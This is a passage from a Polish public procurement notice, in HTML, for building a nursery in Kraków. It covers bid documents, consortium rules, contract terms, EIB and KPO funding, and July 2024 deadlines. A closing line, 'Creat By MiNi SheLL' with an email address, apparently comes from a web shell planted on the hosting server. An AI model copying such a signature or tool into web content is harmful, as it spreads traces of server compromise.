2 do SWZ, powinien on zawierać wszystkie wymagane informacje określone w tym załączniku. Formularz oferty<br/>nie podlega uzupełnieniu.<br/>1.2. Oświadczenie/Oświadczenia, o którym/-ch mowa w sekcji XVI pkt 2 SWZ.<br/>1.3. Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, o ile wskaże w Formularzu oferty dane umożliwiające dostęp do tych dokumentów za pomocą bezpłatnych i ogólnodostępnych baz danych.<br/>1.4. Jeżeli dotyczy – Pełnomocnictwa.<br/><br/>2. Na podstawie Polecenia Służbowego Prezydenta Miasta Krakowa Nr 20/2022 z dnia 11 sierpnia 2022 r. w sprawie Instrukcji do zadań będących przedmiotem Pism Alokacyjnych w ramach poprzednich alokacji kredytów EBI, Zamawiający będzie badał czy została podjęta wobec Wykonawcy decyzja o wykluczeniu lub decyzja o tymczasowym zawieszeniu zgodnie z Polityką Wykluczeń Europejskiego Banku Inwestycyjnego. W tym celu Wykonawca przedkłada wraz z ofertą Oświadczenie o niepodleganiu wykluczeniu / zawieszeniu sporządzone wg wzoru stanowiącego Załącznik nr 9 do SWZ.<br/><br/>3. Informacje dotyczące formy składanych podmiotowych środków dowodowych, innych dokumentów lub oświadczeń zostały określone w sekcji XVI pkt 4 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. członkowie konsorcjum, wspólnicy spółki cywilnej). W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, warunki udziału w postępowaniu wskazane w Sekcji XIV pkt. 2 SWZ, mogą spełniać łącznie. <br/>3. Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu, może powoływać się na doświadczenie zdobyte w ramach konsorcjum przy realizacji innego zamówienia publicznego, tylko wtedy, gdy faktycznie uczestniczył w jego realizacji. W takim przypadku Zamawiający żąda wskazania przez Wykonawcę tylko zakresu zamówienia, w którym realnie uczestniczył. <br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane do realizacji których te zdolności są wymagane. <br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego będzie wynikało, które prace wykonają poszczególni Wykonawcy, wg wzoru stanowiącego załącznik nr 5 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowne (PPU) w sprawie zamówienia publicznego, które zostaną wprowadzone do treści umowy, zostały określone w załączniku nr 1 do SWZ.<br/>2. Zmiany Projektowanych postanowień umownych (PPU) zostały określone w załączniku nr 1 do SWZ (§ 22). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę należy złożyć na Platformie pod adresem https://zimkrakow.ezamawiajacy.pl . 2. Szczegółowy sposób złożenia oferty został opisany w sekcji XI SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamówienie jest realizowane w ramach zadania inwestycyjnego nr ZIM/Z3.5/23 pn.: Budowa żłobka przy ul. przy ul. Karaszewicza-Tokarzewskiego. <br/><br/>2. Zadanie objęte jest dofinansowaniem w ramach Programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „MALUCH+” 2022-2029 finansowanym ze środków Krajowego Planu Odbudowy i Zwiększania Odporności (KPO). W razie wystąpienia zwłoki Wykonawcy, skutkującej utratą dofinansowania lub korektą finansową nałożoną na Zamawiającego, Zamawiający zastrzega sobie prawo wystąpienia w stosunku do Wykonawcy z roszczeniem o zapłatę utraconego dofinansowania. <br/><br/>3. Niniejsze zamówienie realizowane jest z wykorzystaniem środków finansowych pochodzących z Europejskiego Banku Inwestycyjnego zwanym dalej „EBI” (z siedzibą: w Luksemburgi, 100blvd Konrad Adenauer, L-2950 Luksemburg) na podstawie umowy finansowej nr (FI No) 94.304 (Numer operacyjny (Serapis No) 2022-0034 Krakow Urban Development (Rozwój Obszarów Miejskich Krakowa). Szczegółowe obowiązki Wykonawcy w tym zakresie określa Załącznik nr 13 do PPU. <br/><br/>4. Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy osób wykonujących czynności związane z realizacją robót ogólnobudowlanych (w tym zbrojarskich, betoniarskich i murarskich), w zakresie realizacji zamówienia. Wymagania w zakresie zatrudnienia na podstawie stosunku pracy, o których mowa w art. 95 ustawy Pzp zostały określone w PPU (§ 4 ust. 12 i 13). <br/><br/>5. Uwaga do sekcji IV pkt 4.2.10.) ogłoszenia: Wykonawca zobowiązany jest wykonać przedmiot zamówienia w terminie do 20 miesięcy licząc od dnia zawarcia umowy.<br/>Strony ustalają następujące terminy umowne:<br/>1)	Etap I – w terminie do ośmiu miesięcy licząc od dnia zawarcia umowy;<br/>2)	Etap II – w terminie do dwudziestu miesięcy licząc od dnia zawarcia umowy.<br/>Szczegółowe informacje dotyczące terminów wykonania zamówienia zostały określone w PPU, w tym w szczególności w §6.<br/><br/>6. Szczegółowe informacje dotyczące niniejszego postępowania zostały określone w SWZ, dostępnej na stronie internetowej prowadzonego postępowania.<br/><br/>7. Wybrany Wykonawca zobowiązany jest przed zawarciem umowy do przedłożenia Zamawiającemu: <br/>1) dowodu wniesienia zabezpieczenia należytego wykonania umowy zgodnie z Sekcją XXI SWZ (w przypadku wnoszenia zabezpieczenia w innej formie niż pieniądz, zalecane jest wyprzedzające przedłożenie przez Wykonawcę projektu dokumentu zabezpieczenia - w celu uzyskania akceptacji jego treści dotyczącej zgodności z SWZ i umową); <br/>2) dokumenty potwierdzające posiadanie wymaganych w § 16 PPU ubezpieczeń najpóźniej w dniu zawarcia Umowy, w formie: oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę wraz z dowodem jej opłacenia (zalecane jest wyprzedzające przedłożenie przez Wykonawcę dokumentów ubezpieczeń, w celu uzyskania akceptacji jego treści dotyczącej zgodności z postanowieniami umowy);<br/>3) kserokopii uprawnień budowlanych do projektowania bez ograniczeń w specjalności architektonicznej dla osoby Głównego Projektanta, o którym mowa w Sekcji XIV pkt. 2.2., potwierdzonej „za zgodność z oryginałem” wraz z aktualnym zaświadczeniem o przynależności do Okręgowej Izby Samorządu Zawodowego. <br/>4) oświadczenia czy Wykonawca nie podlega/podlega sankcjom wskazanym w treści załącznika nr 10 do PPU.

Creat By MiNi SheLL
Email: jattceo@gmail.com